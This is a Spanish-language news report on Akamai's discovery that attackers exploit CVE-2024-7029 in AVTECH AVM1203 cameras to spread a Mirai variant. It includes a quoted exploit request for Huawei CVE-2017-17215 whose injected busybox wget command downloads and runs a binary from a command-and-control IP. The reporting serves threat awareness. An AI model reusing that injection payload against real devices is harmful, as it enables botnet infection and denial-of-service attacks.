Los piratas informáticos maliciosos están explotando una vulnerabilidad crítica en una cámara de seguridad ampliamente utilizada para propagar Mirai, una familia de malware que introduce dispositivos infectados de Internet de las cosas en grandes redes para su uso en ataques que eliminan sitios web y otros dispositivos conectados a Internet. Los ataques tienen como objetivo el AVM1203, un dispositivo de vigilancia del fabricante taiwanés AVTECH, dijo el miércoles el proveedor de seguridad de redes Akamai. Atacantes desconocidos han estado explotando una vulnerabilidad de hace 5 años desde marzo. La vulnerabilidad de día cero, identificada como CVE-2024-7029, es fácil de explotar y permite a los atacantes ejecutar código malicioso. El AVM1203 ya no se vende ni se le da soporte, por lo que no hay actualizaciones disponibles para solucionar el crítico día cero. En esa ocasión, un ejército heterogéneo sacudió Internet. Akamai dijo que los atacantes están explotando la vulnerabilidad para poder instalar una variante de Mirai, que llegó en septiembre de 2016 cuando una red de bots de dispositivos infectados derribó el sitio de noticias de ciberseguridad Krebs on Security. Mirai contenía una funcionalidad que permitía a un ejército heterogéneo de cámaras web, enrutadores y otros tipos de dispositivos IoT comprometidos lanzar ataques distribuidos de denegación de servicio de tamaños récord. En las semanas siguientes, la botnet Mirai realizó ataques similares a proveedores de servicios de Internet y otros objetivos. Uno de esos ataques, contra el proveedor de nombres de dominio dinámico Dyn, paralizó vastas franjas de Internet. Para complicar los intentos de contener a Mirai, sus creadores lanzaron el malware al público, una medida que permitió que prácticamente cualquier persona creara sus propias botnets que lanzaron ataques DDoS de un tamaño inimaginable. Kyle Lefton, un investigador de seguridad del Equipo de Inteligencia y Respuesta de Seguridad de Akamai, dijo en un correo electrónico que ha observado que el actor de amenazas detrás de los ataques realiza ataques DDoS contra «varias organizaciones», que no nombró ni describió con más detalle. Hasta ahora, el equipo no ha visto ninguna indicación de que los actores de amenazas estén monitoreando transmisiones de video o usando las cámaras infectadas para otros fines. Akamai detectó la actividad utilizando un «honeypot» de dispositivos que imitan las cámaras de Internet abierta para observar cualquier ataque que los tenga como objetivo. La técnica no permite a los investigadores medir el tamaño de la botnet. La Agencia de Seguridad de Infraestructura y Ciberseguridad de Estados Unidos advirtió sobre la vulnerabilidad a principios de este mes. Sin embargo, la técnica ha permitido a Akamai capturar el código utilizado para comprometer los dispositivos. Se dirige a una vulnerabilidad que se conoce desde al menos 2019, cuando el código de explotación se hizo público. El día cero reside en el «argumento de brillo en el parámetro ‘action='» y permite la inyección de comandos, escribieron los investigadores. El día cero, descubierto por la investigadora de Akamai Aline Eliovich, no fue reconocido formalmente hasta este mes, con la publicación de CVE-2024-7029. La publicación del miércoles continuaba diciendo: ¿Cómo funciona? Esta vulnerabilidad se descubrió originalmente al examinar nuestros registros de honeypot. La Figura 1 muestra la URL decodificada para mayor claridad. Carga útil decodificada Ampliar / Fig. 1: Cuerpo de la carga útil decodificada de los intentos de explotación Akamai Fig. 1: Cuerpo de la carga útil decodificada de los intentos de explotación La vulnerabilidad se encuentra en la función de brillo dentro del archivo /cgi-bin/supervisor/Factory.cgi (Figura 2). Ampliar / Fig. 2: PoC del exploit Akamai ¿Qué podría pasar? En los ejemplos de explotación que observamos, esencialmente lo que sucedió es esto: La explotación de esta vulnerabilidad permite a un atacante ejecutar código remoto en un sistema de destino. La Figura 3 es un ejemplo de un actor de amenazas que explota esta falla para descargar y ejecutar un archivo JavaScript para obtener y cargar su carga útil de malware principal. Al igual que muchas otras botnets, esta también está difundiendo una variante del malware Mirai a sus objetivos. Ampliar / Fig. 3: Cadenas del descargador de JavaScriptAkamai En este caso, es probable que la botnet esté utilizando la variante Corona Mirai, a la que otros proveedores han hecho referencia ya en 2020 en relación con el virus COVID-19. Tras su ejecución, el malware se conecta a una gran cantidad de hosts a través de Telnet en los puertos 23, 2323 y 37215. También imprime la cadena «Corona» en la consola de un host infectado (Figura 4). Ampliar / Fig. 4: Ejecución de malware que muestra la salida en la consolaAkamai El análisis estático de las cadenas en las muestras de malware muestra que se apunta a la ruta /ctrlt/DeviceUpgrade_1 en un intento de explotar los dispositivos Huawei afectados por CVE-2017-17215. Las muestras tienen dos direcciones IP de comando y control codificadas, una de las cuales es parte del código de explotación CVE-2017-17215: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username=\»dslf-config\», realm=\»HuaweiHomeGateway\», nonce=\»88645cefb1f9ede0e336e3569d75ee30\», uri=\»/ctrlt/DeviceUpgrade_1\», response=\»3612f843a42db38f48f59d2a3597e19c\», algorithm=\»MD5\», qop=\»auth\», nc=00000001, cnonce=\»248d1a2560100669\» $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP) La botnet también apuntó a otras vulnerabilidades, incluidas una RCE de Hadoop YARN, CVE-2014-8361 y CVE-2017-17215. Hemos observado que estas vulnerabilidades se explotan en la naturaleza varias veces y siguen teniendo éxito. Dado que este modelo de cámara ya no es compatible, la mejor acción para cualquiera que use una es reemplazarla. Al igual que con todos los dispositivos conectados a Internet, los dispositivos IoT nunca deben ser accesibles utilizando las credenciales predeterminadas que se envían con ellos.